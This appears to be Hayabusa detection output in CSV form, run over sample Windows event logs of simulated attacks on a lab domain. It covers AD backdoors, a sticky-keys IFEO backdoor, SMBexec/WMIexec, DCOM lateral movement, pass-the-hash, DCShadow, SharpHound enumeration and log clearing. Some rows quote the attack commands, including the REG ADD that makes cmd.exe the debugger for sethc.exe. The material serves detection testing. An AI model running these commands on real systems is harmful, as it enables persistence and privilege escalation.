2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | CreateKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 5D63072B-84DE-6086-7B49-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 5D63072B-84DE-6086-7B49-000000000C00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
2021-04-26 18:17:14.111 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /t REG_SZ /v Debugger /d ""C:\windows\system32\cmd.exe"" /f | Path: C:\Windows\System32\reg.exe | PID: 0x1b30 | User: admmig | LID: 0x2b5f6bf",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx
2021-04-26 18:17:37.439 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\windows\system32\cmd.exe sethc.exe 211 | Path: C:\Windows\System32\cmd.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx
2021-04-26 18:18:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1464 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx
2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx
2021-04-26 23:16:45.757 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\seth2c.exe | Process: C:\Windows\system32\cmd.exe | PID: 1960 | PGUID: 7CF65FC7-C199-6086-520A-000000002000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx
2021-04-26 23:16:47.267 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\sethc.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3328 | PGUID: 7CF65FC7-CAF6-6086-930A-000000002000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx
2021-04-27 00:03:05.976 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\execute.bat | Process: C:\Windows\system32\cmd.exe | PID: 3492 | PGUID: 7CF65FC7-D629-6086-B70A-000000002000,rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID11,13-SMBexec service registration.evtx"
2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | LID: 0x3e7 | PID: 3068 | PGUID: 7CF65FC7-D629-6086-B80A-000000002000 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process execution.evtx
2021-04-27 00:16:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1548 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
2021-04-27 00:16:04.047 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\mmc.exe -Embedding | Path: C:\Windows\System32\mmc.exe | PID: 0xda4 | User: SRVDEFENDER01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
2021-04-27 20:04:03.495 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
2021-04-27 20:04:03.502 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c301,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x20ee2c3d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c901,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x20ee3135,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2847721c,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x74005fb3,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb108529d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f93ef,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd49db,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204a9a12,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x28477800,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x62cbf9f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f8ca7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x740075dc,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb1086cfb,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f9930,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd4ec6,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204aa3a4,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x62cf99e,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f96be,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x3902ac4,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df84d08,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x57d352ca,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13fa915,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x87371f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x3902ff1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df8549a,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x57d35acf,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13faf39,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x873c5b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
